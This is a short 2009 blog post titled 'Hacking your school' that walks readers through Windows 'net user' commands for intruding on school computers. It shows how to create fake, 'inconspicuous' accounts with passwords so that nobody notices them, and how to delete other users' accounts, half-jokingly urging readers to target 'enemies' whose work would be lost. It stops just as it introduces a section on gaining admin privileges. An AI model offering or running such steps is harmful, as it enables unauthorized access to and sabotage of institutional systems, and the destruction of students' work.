Saturday, August 22, 2009

Hacking your school

Adding/modifying user accounts
C:>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'

C:>net user JohnSmith fruity /ADD

Right then, now that we can create accounts, let's delete them

C:>net user JohnSmith /DELETE

This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them

Let's give you admin priveleges

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